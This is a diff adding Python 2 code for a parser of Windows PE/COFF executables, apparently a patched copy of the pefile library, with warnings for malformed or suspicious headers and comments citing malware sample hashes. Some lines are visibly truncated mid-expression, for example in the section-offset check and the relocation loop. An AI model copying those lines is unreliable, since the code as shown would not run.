+ ('H,Magic', 'B,MajorLinkerVersion',
+ 'B,MinorLinkerVersion', 'L,SizeOfCode',
+ 'L,SizeOfInitializedData', 'L,SizeOfUninitializedData',
+ 'L,AddressOfEntryPoint', 'L,BaseOfCode', 'L,BaseOfData',
+ 'L,ImageBase', 'L,SectionAlignment', 'L,FileAlignment',
+ 'H,MajorOperatingSystemVersion', 'H,MinorOperatingSystemVersion',
+ 'H,MajorImageVersion', 'H,MinorImageVersion',
+ 'H,MajorSubsystemVersion', 'H,MinorSubsystemVersion',
+ 'L,Reserved1', 'L,SizeOfImage', 'L,SizeOfHeaders',
+ 'L,CheckSum', 'H,Subsystem', 'H,DllCharacteristics',
+ 'L,SizeOfStackReserve', 'L,SizeOfStackCommit',
+ 'L,SizeOfHeapReserve', 'L,SizeOfHeapCommit',
+ 'L,LoaderFlags', 'L,NumberOfRvaAndSizes' ))
+
+
+ __IMAGE_OPTIONAL_HEADER64_format__ = ('IMAGE_OPTIONAL_HEADER64',
+ ('H,Magic', 'B,MajorLinkerVersion',
+ 'B,MinorLinkerVersion', 'L,SizeOfCode',
+ 'L,SizeOfInitializedData', 'L,SizeOfUninitializedData',
+ 'L,AddressOfEntryPoint', 'L,BaseOfCode',
+ 'Q,ImageBase', 'L,SectionAlignment', 'L,FileAlignment',
+ 'H,MajorOperatingSystemVersion', 'H,MinorOperatingSystemVersion',
+ 'H,MajorImageVersion', 'H,MinorImageVersion',
+ 'H,MajorSubsystemVersion', 'H,MinorSubsystemVersion',
+ 'L,Reserved1', 'L,SizeOfImage', 'L,SizeOfHeaders',
+ 'L,CheckSum', 'H,Subsystem', 'H,DllCharacteristics',
+ 'Q,SizeOfStackReserve', 'Q,SizeOfStackCommit',
+ 'Q,SizeOfHeapReserve', 'Q,SizeOfHeapCommit',
+ 'L,LoaderFlags', 'L,NumberOfRvaAndSizes' ))
+
+ __IMAGE_DELAY_IMPORT_DESCRIPTOR_format__ = ('IMAGE_DELAY_IMPORT_DESCRIPTOR',
+ ('L,grAttrs', 'L,szName', 'L,phmod', 'L,pIAT', 'L,pINT',
+ 'L,pBoundIAT', 'L,pUnloadIAT', 'L,dwTimeStamp'))
+
+ __IMAGE_IMPORT_DESCRIPTOR_format__ = ('IMAGE_IMPORT_DESCRIPTOR',
+ ('L,OriginalFirstThunk,Characteristics',
+ 'L,TimeDateStamp', 'L,ForwarderChain', 'L,Name', 'L,FirstThunk'))
+
+ __IMAGE_EXPORT_DIRECTORY_format__ = ('IMAGE_EXPORT_DIRECTORY',
+ ('L,Characteristics',
+ 'L,TimeDateStamp', 'H,MajorVersion', 'H,MinorVersion', 'L,Name',
+ 'L,Base', 'L,NumberOfFunctions', 'L,NumberOfNames',
+ 'L,AddressOfFunctions', 'L,AddressOfNames', 'L,AddressOfNameOrdinals'))
+
+ __IMAGE_RESOURCE_DIRECTORY_format__ = ('IMAGE_RESOURCE_DIRECTORY',
+ ('L,Characteristics',
+ 'L,TimeDateStamp', 'H,MajorVersion', 'H,MinorVersion',
+ 'H,NumberOfNamedEntries', 'H,NumberOfIdEntries'))
+
+ __IMAGE_RESOURCE_DIRECTORY_ENTRY_format__ = ('IMAGE_RESOURCE_DIRECTORY_ENTRY',
+ ('L,Name',
+ 'L,OffsetToData'))
+
+ __IMAGE_RESOURCE_DATA_ENTRY_format__ = ('IMAGE_RESOURCE_DATA_ENTRY',
+ ('L,OffsetToData', 'L,Size', 'L,CodePage', 'L,Reserved'))
+
+ __VS_VERSIONINFO_format__ = ( 'VS_VERSIONINFO',
+ ('H,Length', 'H,ValueLength', 'H,Type' ))
+
+ __VS_FIXEDFILEINFO_format__ = ( 'VS_FIXEDFILEINFO',
+ ('L,Signature', 'L,StrucVersion', 'L,FileVersionMS', 'L,FileVersionLS',
+ 'L,ProductVersionMS', 'L,ProductVersionLS', 'L,FileFlagsMask', 'L,FileFlags',
+ 'L,FileOS', 'L,FileType', 'L,FileSubtype', 'L,FileDateMS', 'L,FileDateLS'))
+
+ __StringFileInfo_format__ = ( 'StringFileInfo',
+ ('H,Length', 'H,ValueLength', 'H,Type' ))
+
+ __StringTable_format__ = ( 'StringTable',
+ ('H,Length', 'H,ValueLength', 'H,Type' ))
+
+ __String_format__ = ( 'String',
+ ('H,Length', 'H,ValueLength', 'H,Type' ))
+
+ __Var_format__ = ( 'Var', ('H,Length', 'H,ValueLength', 'H,Type' ))
+
+ __IMAGE_THUNK_DATA_format__ = ('IMAGE_THUNK_DATA',
+ ('L,ForwarderString,Function,Ordinal,AddressOfData',))
+
+ __IMAGE_THUNK_DATA64_format__ = ('IMAGE_THUNK_DATA',
+ ('Q,ForwarderString,Function,Ordinal,AddressOfData',))
+
+ __IMAGE_DEBUG_DIRECTORY_format__ = ('IMAGE_DEBUG_DIRECTORY',
+ ('L,Characteristics', 'L,TimeDateStamp', 'H,MajorVersion',
+ 'H,MinorVersion', 'L,Type', 'L,SizeOfData', 'L,AddressOfRawData',
+ 'L,PointerToRawData'))
+
+ __IMAGE_BASE_RELOCATION_format__ = ('IMAGE_BASE_RELOCATION',
+ ('L,VirtualAddress', 'L,SizeOfBlock') )
+
+ __IMAGE_TLS_DIRECTORY_format__ = ('IMAGE_TLS_DIRECTORY',
+ ('L,StartAddressOfRawData', 'L,EndAddressOfRawData',
+ 'L,AddressOfIndex', 'L,AddressOfCallBacks',
+ 'L,SizeOfZeroFill', 'L,Characteristics' ) )
+
+ __IMAGE_TLS_DIRECTORY64_format__ = ('IMAGE_TLS_DIRECTORY',
+ ('Q,StartAddressOfRawData', 'Q,EndAddressOfRawData',
+ 'Q,AddressOfIndex', 'Q,AddressOfCallBacks',
+ 'L,SizeOfZeroFill', 'L,Characteristics' ) )
+
+ __IMAGE_BOUND_IMPORT_DESCRIPTOR_format__ = ('IMAGE_BOUND_IMPORT_DESCRIPTOR',
+ ('L,TimeDateStamp', 'H,OffsetModuleName', 'H,NumberOfModuleForwarderRefs'))
+
+ __IMAGE_BOUND_FORWARDER_REF_format__ = ('IMAGE_BOUND_FORWARDER_REF',
+ ('L,TimeDateStamp', 'H,OffsetModuleName', 'H,Reserved') )
+
+
+
+ def __init__(self, data=None):
+
+ self.sections = []
+
+ self.__warnings = []
+
+ self.PE_TYPE = None
+
+ if not data:
+ return
+
+ # This list will keep track of all the structures created.
+ # That will allow for an easy iteration through the list
+ # in order to save the modifications made
+ self.__structures__ = []
+
+ self.__data__ = data
+
+ self.__parse__()
+
+
+
+ def __unpack_data__(self, format, data, file_offset):
+ """Apply structure format to raw data.
+
+ Returns and unpacked structure object if successful, None otherwise.
+ """
+
+ structure = Structure(format, file_offset=file_offset)
+ #if len(data) < structure.sizeof():
+ # return None
+
+ try:
+ structure.__unpack__(data)
+ except PEFormatError, err:
+ self.__warnings.append(
+ 'Corrupt header "%s" at file offset %d. Exception: %s' % (
+ format[0], file_offset, str(err)) )
+ return None
+
+ self.__structures__.append(structure)
+
+ return structure
+
+
+ def __parse__(self, file_header_offset=0, require_optional_header=None):
+ """Parse a Portable Executable file.
+
+ Loads a PE file, parsing all its structures and making them available
+ through the instance's attributes.
+
+ @@file_header_offset should only be used for the case of PE which has
+ headers before the COFF 'file header'.
+ """
+ self.__file_header_offset__ = file_header_offset
+
+ self.FILE_HEADER = self.__unpack_data__(
+ self.__IMAGE_FILE_HEADER_format__,
+ self.__data__[file_header_offset:],
+ file_offset = file_header_offset)
+ image_flags = self.retrieve_flags(IMAGE_CHARACTERISTICS, 'IMAGE_FILE_')
+
+ if not self.FILE_HEADER:
+ raise PEFormatError('File Header missing')
+
+ # Set the image's flags according the the Characteristics member
+ self.set_flags(self.FILE_HEADER, self.FILE_HEADER.Characteristics, image_flags)
+
+ optional_header_offset = file_header_offset + self.FILE_HEADER.sizeof()
+
+ try:
+ self.parse_optional_header(optional_header_offset)
+ except:
+ if require_optional_header:
+ raise
+ self.OPTIONAL_HEADER = None
+
+ # Note: location of sections can be controlled from PE header:
+ sections_offset = optional_header_offset + self.FILE_HEADER.SizeOfOptionalHeader
+
+ offset = self.parse_sections(sections_offset)
+
+ # OC Patch:
+ # There could be a problem if there are no raw data sections
+ # greater than 0
+ # fc91013eb72529da005110a3403541b6 example
+ # Should this throw an exception in the minimum header offset
+ # can't be found?
+ #
+ rawDataPointers = [
+ s.PointerToRawData for s in self.sections if s.PointerToRawData>0]
+
+ if len(rawDataPointers) > 0:
+ lowest_section_offset = min(rawDataPointers)
+ else:
+ lowest_section_offset = None
+
+ if not lowest_section_offset or lowest_section_offset len(self.__data__):
+
+ self.__warnings.append(
+ 'Possibly corrupt file. AddressOfEntryPoint lies outside the file. ' +
+ 'AddressOfEntryPoint: 0x%x' %
+ self.OPTIONAL_HEADER.AddressOfEntryPoint )
+ else:
+ self.__warnings.append(
+ 'AddressOfEntryPoint lies outside the sections\' boundaries. ' +
+ 'AddressOfEntryPoint: 0x%x' %
+ self.OPTIONAL_HEADER.AddressOfEntryPoint )
+
+ self.parse_symboltable()
+
+ def parse_symboltable(self):
+ string_table_offset = self.FILE_HEADER.PointerToSymbolTable + self.FILE_HEADER.NumberOfSymbols * 18
+ self.COFFStringTable = \
+ self.__data__[
+ string_table_offset:
+ string_table_offset + struct.unpack("I", self.__data__[string_table_offset:string_table_offset+4])[0]]
+
+ self.SymbolTable = []
+ self.SymbolTableByName = {}
+ offset = self.FILE_HEADER.PointerToSymbolTable
+ while offset < string_table_offset:
+ symbol = SymbolStructure(self)
+ symbol.__unpack__(self.__data__[offset:])
+ offset += symbol.sizeof()
+ self.SymbolTable.append(symbol)
+ if symbol.NumberOfAuxSymbols > 0:
+ #if this is a real function, it should has an auxiliary Function Definition symbol
+ if symbol.is_function() and symbol.has_function_implementation():
+ aux = AuxSymbolStructure(self, 'functiondef')
+ aux.__unpack__(self.__data__[offset:])
+ symbol.__auxsymbols__.append(aux)
+ #Weak external aux symbol
+ elif symbol.StorageClass == IMAGE_SYMBOL_CLASSES['IMAGE_SYM_CLASS_WEAK_EXTERNAL'] and symbol.SectionNumber == IMAGE_SYM_UNDEFINED and \
+ symbol.Value == 0:
+ aux = AuxSymbolStructure(self, 'weakexternal')
+ aux.__unpack__(self.__data__[offset:])
+ symbol.__auxsymbols__.append(aux)
+ #create null symbols for each auxiliary entry
+ for i in xrange(symbol.NumberOfAuxSymbols):
+ self.SymbolTable.append(None)
+ offset += symbol.sizeof()
+ self.SymbolTableByName[symbol.Name]=symbol
+
+ def parse_optional_header(self, optional_header_offset):
+
+ self.OPTIONAL_HEADER = self.__unpack_data__(
+ self.__IMAGE_OPTIONAL_HEADER_format__,
+ self.__data__[optional_header_offset:],
+ file_offset = optional_header_offset)
+
+ # According to solardesigner's findings for his
+ # Tiny PE project, the optional header does not
+ # need fields beyond "Subsystem" in order to be
+ # loadable by the Windows loader (given that zeroes
+ # are acceptable values and the header is loaded
+ # in a zeroed memory page)
+ # If trying to parse a full Optional Header fails
+ # we try to parse it again with some 0 padding
+ #
+ MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE = 69
+
+ if ( self.OPTIONAL_HEADER is None and
+ len(self.__data__[optional_header_offset:])
+ >= MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE ):
+
+ # Add enough zeroes to make up for the unused fields
+ #
+ padding_length = 128
+
+ # Create padding
+ #
+ padded_data = self.__data__[optional_header_offset:] + (
+ '\0' * padding_length)
+
+ self.OPTIONAL_HEADER = self.__unpack_data__(
+ self.__IMAGE_OPTIONAL_HEADER_format__,
+ padded_data,
+ file_offset = optional_header_offset)
+
+
+ # Check the Magic in the OPTIONAL_HEADER and set the PE file
+ # type accordingly
+ #
+ if self.OPTIONAL_HEADER is not None:
+
+ if self.OPTIONAL_HEADER.Magic == OPTIONAL_HEADER_MAGIC_PE:
+
+ self.PE_TYPE = OPTIONAL_HEADER_MAGIC_PE
+
+ elif self.OPTIONAL_HEADER.Magic == OPTIONAL_HEADER_MAGIC_PE_PLUS:
+
+ self.PE_TYPE = OPTIONAL_HEADER_MAGIC_PE_PLUS
+
+ self.OPTIONAL_HEADER = self.__unpack_data__(
+ self.__IMAGE_OPTIONAL_HEADER64_format__,
+ self.__data__[optional_header_offset:],
+ file_offset = optional_header_offset)
+
+ # Again, as explained above, we try to parse
+ # a reduced form of the Optional Header which
+ # is still valid despite not including all
+ # structure members
+ #
+ MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE = 69+4
+
+ if ( self.OPTIONAL_HEADER is None and
+ len(self.__data__[optional_header_offset:])
+ >= MINIMUM_VALID_OPTIONAL_HEADER_RAW_SIZE ):
+
+ padding_length = 128
+ padded_data = self.__data__[optional_header_offset:] + (
+ '\0' * padding_length)
+ self.OPTIONAL_HEADER = self.__unpack_data__(
+ self.__IMAGE_OPTIONAL_HEADER64_format__,
+ padded_data,
+ file_offset = optional_header_offset)
+
+
+
+ # OC Patch:
+ # Die gracefully if there is no OPTIONAL_HEADER field
+ # 975440f5ad5e2e4a92c4d9a5f22f75c1
+ if self.PE_TYPE is None or self.OPTIONAL_HEADER is None:
+ raise PEFormatError("No Optional Header found, invalid PE32 or PE32+ file")
+
+ dll_characteristics_flags = self.retrieve_flags(DLL_CHARACTERISTICS, 'IMAGE_DLL_CHARACTERISTICS_')
+
+ # Set the Dll Characteristics flags according the the DllCharacteristics member
+ self.set_flags(
+ self.OPTIONAL_HEADER,
+ self.OPTIONAL_HEADER.DllCharacteristics,
+ dll_characteristics_flags)
+
+
+ self.OPTIONAL_HEADER.DATA_DIRECTORY = []
+ #offset = (optional_header_offset + self.FILE_HEADER.SizeOfOptionalHeader)
+ offset = (optional_header_offset + self.OPTIONAL_HEADER.sizeof())
+
+
+
+ # The NumberOfRvaAndSizes is sanitized to stay within
+ # reasonable limits so can be casted to an int
+ #
+ if self.OPTIONAL_HEADER.NumberOfRvaAndSizes > 0x10:
+ self.__warnings.append(
+ 'Suspicious NumberOfRvaAndSizes in the Optional Header. ' +
+ 'Normal values are never larger than 0x10, the value is: 0x%x' %
+ self.OPTIONAL_HEADER.NumberOfRvaAndSizes )
+
+ for i in xrange(int(0x7fffffffL & self.OPTIONAL_HEADER.NumberOfRvaAndSizes)):
+
+ if len(self.__data__[offset:]) == 0:
+ break
+
+ if len(self.__data__[offset:]) < 8:
+ data = self.__data__[offset:]+'\0'*8
+ else:
+ data = self.__data__[offset:]
+
+ dir_entry = self.__unpack_data__(
+ self.__IMAGE_DATA_DIRECTORY_format__,
+ data,
+ file_offset = offset)
+
+ if dir_entry is None:
+ break
+
+ # Would fail if missing an entry
+ # 1d4937b2fa4d84ad1bce0309857e70ca offending sample
+ try:
+ dir_entry.name = DIRECTORY_ENTRY[i]
+ except (KeyError, AttributeError):
+ break
+
+ offset += dir_entry.sizeof()
+
+ self.OPTIONAL_HEADER.DATA_DIRECTORY.append(dir_entry)
+
+ # If the offset goes outside the optional header,
+ # the loop is broken, regardless of how many directories
+ # NumberOfRvaAndSizes says there are
+ #
+ # We assume a normally sized optional header, hence that we do
+ # a sizeof() instead of reading SizeOfOptionalHeader.
+ # Then we add a default number of drectories times their size,
+ # if we go beyond that, we assume the number of directories
+ # is wrong and stop processing
+ if offset >= (optional_header_offset +
+ self.OPTIONAL_HEADER.sizeof() + 8*16) :
+
+ break
+
+ def get_warnings(self):
+ """Return the list of warnings.
+
+ Non-critical problems found when parsing the PE file are
+ appended to a list of warnings. This method returns the
+ full list.
+ """
+
+ return self.__warnings
+
+
+ def show_warnings(self):
+ """Print the list of warnings.
+
+ Non-critical problems found when parsing the PE file are
+ appended to a list of warnings. This method prints the
+ full list to standard output.
+ """
+
+ for warning in self.__warnings:
+ print '>', warning
+
+
+ def full_load(self):
+ """Process the data directories.
+
+ This mathod will load the data directories which might not have
+ been loaded if the "fast_load" option was used.
+ """
+
+ self.parse_data_directories()
+
+
+ def write(self, filename=None):
+ """Write the PE file.
+
+ This function will process all headers and components
+ of the PE file and include all changes made (by just
+ assigning to attributes in the PE objects) and write
+ the changes back to a file whose name is provided as
+ an argument. The filename is optional.
+ The data to be written to the file will be returned
+ as a 'str' object.
+ """
+
+ file_data = list(self.__data__)
+ for struct in self.__structures__:
+
+ struct_data = list(struct.__pack__())
+ offset = struct.get_file_offset()
+
+ file_data[offset:offset+len(struct_data)] = struct_data
+
+ new_file_data = ''.join(file_data)
+ if filename:
+ f = file(filename, 'wb+')
+ f.write(new_file_data)
+ f.close()
+
+ return new_file_data
+
+
+
+ def parse_sections(self, offset):
+ """Fetch the PE file sections.
+
+ The sections will be readily available in the "sections" attribute.
+ Its attributes will contain all the section information plus "data"
+ a buffer containing the section's data.
+
+ The "Characteristics" member will be processed and attributes
+ representing the section characteristics (with the 'IMAGE_SCN_'
+ string trimmed from the constant's names) will be added to the
+ section instance.
+
+ Refer to the SectionStructure class for additional info.
+ """
+
+ self.sections = []
+
+ for i in xrange(self.FILE_HEADER.NumberOfSections):
+ section = SectionStructure(self)
+ if not section:
+ break
+ section_offset = offset + section.sizeof() * i
+ section.set_file_offset(section_offset)
+ section.__unpack__(self.__data__[section_offset:])
+ self.__structures__.append(section)
+
+ if section.SizeOfRawData > len(self.__data__):
+ self.__warnings.append(
+ ('Error parsing section %d. ' % i) +
+ 'SizeOfRawData is larger than file.')
+
+ if section.PointerToRawData > len(self.__data__):
+ self.__warnings.append(
+ ('Error parsing section %d. ' % i) +
+ 'PointerToRawData points beyond the end of the file.')
+
+ if section.Misc_VirtualSize > 0x10000000:
+ self.__warnings.append(
+ ('Suspicious value found parsing section %d. ' % i) +
+ 'VirtualSize is extremely large > 256MiB.')
+
+ if section.VirtualAddress > 0x10000000:
+ self.__warnings.append(
+ ('Suspicious value found parsing section %d. ' % i) +
+ 'VirtualAddress is beyond 0x10000000.')
+
+ section_data_start = section.PointerToRawData
+ if self.OPTIONAL_HEADER:
+ #
+ # Some packer used a non-aligned PointerToRawData in the sections,
+ # which causes several common tools not to load the section data
+ # properly as they blindly read from the indicated offset.
+ # It seems that Windows will round the offset down to the largest
+ # offset multiple of FileAlignment which is smaller than
+ # PointerToRawData. The following code will do the same.
+ #
+
+ alignment = self.OPTIONAL_HEADER.FileAlignment
+ #section_data_start = int(section_data_start/alignment)*alignment
+
+ if section_data_start % self.OPTIONAL_HEADER.FileAlignment != 0:
+ self.__warnings.append(
+ ('Error parsing section %d. ' % i) +
+ 'Suspicious value for FileAlignment in the Optional Header. ' +
+ 'Normally the PointerToRawData entry of the sections\' structures ' +
+ 'is a multiple of FileAlignment, this might imply the file ' +
+ 'is trying to confuse tools which parse this incorrectly')
+
+ section_data_end = section_data_start+section.SizeOfRawData
+ section.set_data(self.__data__[section_data_start:section_data_end])
+
+ section_relocations_start = section.PointerToRelocations
+ section_relocations_end = section_relocations_start + section.NumberOfRelocations * 10
+ section.set_relocations(self.__data__[section_relocations_start:section_relocations_end])
+
+ section_flags = self.retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
+
+ # Set the section's flags according the the Characteristics member
+ self.set_flags(section, section.Characteristics, section_flags)
+
+ if ( section.__dict__.get('IMAGE_SCN_MEM_WRITE', False) and
+ section.__dict__.get('IMAGE_SCN_MEM_EXECUTE', False) ):
+
+ self.__warnings.append(
+ ('Suspicious flags set for section %d. ' % i) +
+ 'Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.' +
+ 'This might indicate a packed executable.')
+
+ self.sections.append(section)
+
+ if self.FILE_HEADER.NumberOfSections > 0 and self.sections:
+ return offset + self.sections[0].sizeof()*self.FILE_HEADER.NumberOfSections
+ else:
+ return offset
+
+
+ def retrieve_flags(self, flag_dict, flag_filter):
+ """Read the flags from a dictionary and return them in a usable form.
+
+ Will return a list of (flag, value) for all flags in "flag_dict"
+ matching the filter "flag_filter".
+ """
+
+ return [(f[0], f[1]) for f in flag_dict.items() if
+ isinstance(f[0], str) and f[0].startswith(flag_filter)]
+
+
+ def set_flags(self, obj, flag_field, flags):
+ """Will process the flags and set attributes in the object accordingly.
+
+ The object "obj" will gain attritutes named after the flags provided in
+ "flags" and valued True/False, matching the results of applyin each
+ flag value from "flags" to flag_field.
+ """
+
+ for flag in flags:
+ if flag[1] & flag_field:
+ setattr(obj, flag[0], True)
+ else:
+ setattr(obj, flag[0], False)
+
+
+
+ def parse_data_directories(self):
+ """Parse and process the PE file's data directories."""
+
+ directory_parsing = (
+ ('IMAGE_DIRECTORY_ENTRY_IMPORT', self.parse_import_directory),
+ ('IMAGE_DIRECTORY_ENTRY_EXPORT', self.parse_export_directory),
+ ('IMAGE_DIRECTORY_ENTRY_RESOURCE', self.parse_resources_directory),
+ ('IMAGE_DIRECTORY_ENTRY_DEBUG', self.parse_debug_directory),
+ ('IMAGE_DIRECTORY_ENTRY_BASERELOC', self.parse_relocations_directory),
+ ('IMAGE_DIRECTORY_ENTRY_TLS', self.parse_directory_tls),
+ ('IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT', self.parse_delay_import_directory),
+ ('IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT', self.parse_directory_bound_imports) )
+
+ for entry in directory_parsing:
+ # OC Patch:
+ #
+ try:
+ dir_entry = self.OPTIONAL_HEADER.DATA_DIRECTORY[
+ DIRECTORY_ENTRY[entry[0]]]
+ except IndexError:
+ break
+ if dir_entry.VirtualAddress:
+ value = entry[1](dir_entry.VirtualAddress, dir_entry.Size)
+ if value:
+ setattr(self, entry[0][6:], value)
+
+
+ def parse_directory_bound_imports(self, rva, size):
+ """"""
+
+ bnd_descr = Structure(self.__IMAGE_BOUND_IMPORT_DESCRIPTOR_format__)
+ bnd_descr_size = bnd_descr.sizeof()
+ start = rva
+
+ bound_imports = []
+ while True:
+
+ bnd_descr = self.__unpack_data__(
+ self.__IMAGE_BOUND_IMPORT_DESCRIPTOR_format__,
+ self.__data__[rva:rva+bnd_descr_size],
+ file_offset = rva)
+ if bnd_descr is None:
+ # If can't parse directory then silently return.
+ # This directory does not necesarily have to be valid to
+ # still have a valid PE file
+
+ self.__warnings.append(
+ 'The Bound Imports directory exists but can\'t be parsed.')
+
+ return
+
+ if bnd_descr.all_zeroes():
+ break
+
+ rva += bnd_descr.sizeof()
+
+ forwarder_refs = []
+ for idx in xrange(bnd_descr.NumberOfModuleForwarderRefs):
+ # Both structures IMAGE_BOUND_IMPORT_DESCRIPTOR and
+ # IMAGE_BOUND_FORWARDER_REF have the same size.
+ bnd_frwd_ref = self.__unpack_data__(
+ self.__IMAGE_BOUND_FORWARDER_REF_format__,
+ self.__data__[rva:rva+bnd_descr_size],
+ file_offset = rva)
+ # OC Patch:
+ if not bnd_frwd_ref:
+ raise PEFormatError(
+ "IMAGE_BOUND_FORWARDER_REF cannot be read")
+ rva += bnd_frwd_ref.sizeof()
+
+ forwarder_refs.append(BoundImportRefData(
+ struct = bnd_frwd_ref,
+ name = self.get_string_from_data(
+ start+bnd_frwd_ref.OffsetModuleName, self.__data__)))
+
+ bound_imports.append(
+ BoundImportDescData(
+ struct = bnd_descr,
+ name = self.get_string_from_data(
+ start+bnd_descr.OffsetModuleName, self.__data__),
+ entries = forwarder_refs))
+
+ return bound_imports
+
+
+ def parse_directory_tls(self, rva, size):
+ """"""
+
+ if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
+ format = self.__IMAGE_TLS_DIRECTORY_format__
+
+ elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
+ format = self.__IMAGE_TLS_DIRECTORY64_format__
+
+ tls_struct = self.__unpack_data__(
+ format,
+ self.get_data(rva),
+ file_offset = self.get_offset_from_rva(rva))
+
+ if not tls_struct:
+ return None
+
+ return TlsData( struct = tls_struct )
+
+
+ def parse_relocations_directory(self, rva, size):
+ """"""
+
+ rlc = Structure(self.__IMAGE_BASE_RELOCATION_format__)
+ rlc_size = rlc.sizeof()
+ end = rva+size
+
+ relocations = []
+ while rva>12)
+ reloc_offset = (word&0x0fff)
+ entries.append(
+ RelocationData(
+ type = reloc_type,
+ rva = reloc_offset+rva))
+
+ return entries
+
+
+ def parse_debug_directory(self, rva, size):
+ """"""
+
+ dbg = Structure(self.__IMAGE_DEBUG_DIRECTORY_format__)
+ dbg_size = dbg.sizeof()
+
+ debug = []
+ for idx in xrange(size/dbg_size):
+ try:
+ data = self.get_data(rva+dbg_size*idx, dbg_size)
+ except PEFormatError, e:
+ self.__warnings.append(
+ 'Invalid debug information. Can\'t read ' +
+ 'data at RVA: 0x%x' % rva)
+ return None
+
+ dbg = self.__unpack_data__(
+ self.__IMAGE_DEBUG_DIRECTORY_format__,
+ data, file_offset = self.get_offset_from_rva(rva+dbg_size*idx))
+
+ if not dbg:
+ return None
+
+ debug.append(
+ DebugData(
+ struct = dbg))
+
+ return debug
+
+
+ def parse_resources_directory(self, rva, size=0, base_rva = None, level = 0):
+ """Parse the resources directory.
+
+ Given the rva of the resources directory, it will process all
+ its entries.
+
+ The root will have the corresponding member of its structure,
+ IMAGE_RESOURCE_DIRECTORY plus 'entries', a list of all the
+ entries in the directory.
+
+ Those entries will have, correspondingly, all the structure's
+ members (IMAGE_RESOURCE_DIRECTORY_ENTRY) and an additional one,
+ "directory", pointing to the IMAGE_RESOURCE_DIRECTORY structure
+ representing upper layers of the tree. This one will also have
+ an 'entries' attribute, pointing to the 3rd, and last, level.
+ Another directory with more entries. Those last entries will
+ have a new atribute (both 'leaf' or 'data_entry' can be used to
+ access it). This structure finally points to the resource data.
+ All the members of this structure, IMAGE_RESOURCE_DATA_ENTRY,
+ are available as its attributes.
+ """
+
+ # OC Patch:
+ original_rva = rva
+
+ if base_rva is None:
+ base_rva = rva
+
+ resources_section = self.get_section_by_rva(rva)
+
+ try:
+ # If the RVA is invalid all would blow up. Some EXEs seem to be
+ # specially nasty and have an invalid RVA.
+ data = self.get_data(rva)
+ except PEFormatError, e:
+ self.__warnings.append(
+ 'Invalid resources directory. Can\'t read ' +
+ 'directory data at RVA: 0x%x' % rva)
+ return None
+
+ # Get the resource directory structure, that is, the header
+ # of the table preceding the actual entries
+ #
+ resource_dir = self.__unpack_data__(
+ self.__IMAGE_RESOURCE_DIRECTORY_format__, data,
+ file_offset = self.get_offset_from_rva(rva) )
+ if resource_dir is None:
+ # If can't parse resources directory then silently return.
+ # This directory does not necesarily have to be valid to
+ # still have a valid PE file
+ self.__warnings.append(
+ 'Invalid resources directory. Can\'t parse ' +
+ 'directory data at RVA: 0x%x' % rva)
+ return None
+
+ dir_entries = []
+
+ # Advance the rva to the positon immediately following the directory
+ # table header and pointing to the first entry in the table
+ #
+ rva += resource_dir.sizeof()
+
+ number_of_entries = (
+ resource_dir.NumberOfNamedEntries +
+ resource_dir.NumberOfIdEntries )
+
+ strings_to_postprocess = list()
+
+ for idx in xrange(number_of_entries):
+
+ res = self.parse_resource_entry(rva)
+ if res is None:
+ self.__warnings.append(
+ 'Error parsing the resources directory, ' +
+ 'Entry %d is invalid, RVA = 0x%x. ' %
+ (idx, rva) )
+ break
+
+
+ entry_name = None
+ entry_id = None
+
+ # If all named entries have been processed, only Id ones
+ # remain
+
+ if idx >= resource_dir.NumberOfNamedEntries:
+ entry_id = res.Name
+ else:
+ ustr_offset = base_rva+res.NameOffset
+ try:
+ #entry_name = self.get_string_u_at_rva(ustr_offset, max_length=16)
+ entry_name = UnicodeStringWrapperPostProcessor(self, ustr_offset)
+ strings_to_postprocess.append(entry_name)
+
+ except PEFormatError, excp:
+ self.__warnings.append(
+ 'Error parsing the resources directory, ' +
+ 'attempting to read entry name. ' +
+ 'Can\'t read unicode string at offset 0x%x' %
+ (ustr_offset) )
+
+
+ if res.DataIsDirectory:
+ # OC Patch:
+ #
+ # One trick malware can do is to recursively reference
+ # the next directory. This causes hilarity to ensue when
+ # trying to parse everything correctly.
+ # If the original RVA given to this function is equal to
+ # the next one to parse, we assume that it's a trick.
+ # Instead of raising a PEFormatError this would skip some
+ # reasonable data so we just break.
+ #
+ # 9ee4d0a0caf095314fd7041a3e4404dc is the offending sample
+ if original_rva == (base_rva + res.OffsetToDirectory):
+
+ break
+
+ else:
+ entry_directory = self.parse_resources_directory(
+ base_rva+res.OffsetToDirectory,
+ base_rva=base_rva, level = level+1)
+
+ if not entry_directory:
+ break
+ dir_entries.append(
+ ResourceDirEntryData(
+ struct = res,
+ name = entry_name,
+ id = entry_id,
+ directory = entry_directory))
+ else:
+ struct = self.parse_resource_data_entry(
+ base_rva + res.OffsetToDirectory)
+
+ if struct:
+ entry_data = ResourceDataEntryData(
+ struct = struct,
+ lang = res.Name & 0xff,
+ sublang = (res.Name>>8) & 0xff)
+
+ dir_entries.append(
+ ResourceDirEntryData(
+ struct = res,
+ name = entry_name,
+ id = entry_id,
+ data = entry_data))
+
+ rva += res.sizeof()
+
+ # Check if this entry contains version information
+ #
+ if level == 0 and res.Id == RESOURCE_TYPE['RT_VERSION']:
+ if len(dir_entries)>0:
+ last_entry = dir_entries[-1]
+
+ rt_version_struct = None
+ try:
+ rt_version_struct = last_entry.directory.entries[0].directory.entries[0].data.struct
+ except:
+ # Maybe a malformed directory structure...?
+ # Lets ignore it
+ pass
+
+ if rt_version_struct is not None:
+ self.parse_version_information(rt_version_struct)
+
+ string_rvas = [s.get_rva() for s in strings_to_postprocess]
+ string_rvas.sort()
+
+ for idx, s in enumerate(strings_to_postprocess):
+ s.render_pascal_16()
+
+ return ResourceDirData(
+ struct = resource_dir,
+ entries = dir_entries)
+
+
+ def parse_resource_data_entry(self, rva):
+ """Parse a data entry from the resources directory."""
+
+ try:
+ # If the RVA is invalid all would blow up. Some EXEs seem to be
+ # specially nasty and have an invalid RVA.
+ data = self.get_data(rva)
+ except PEFormatError, excp:
+ self.__warnings.append(
+ 'Error parsing a resource directory data entry, ' +
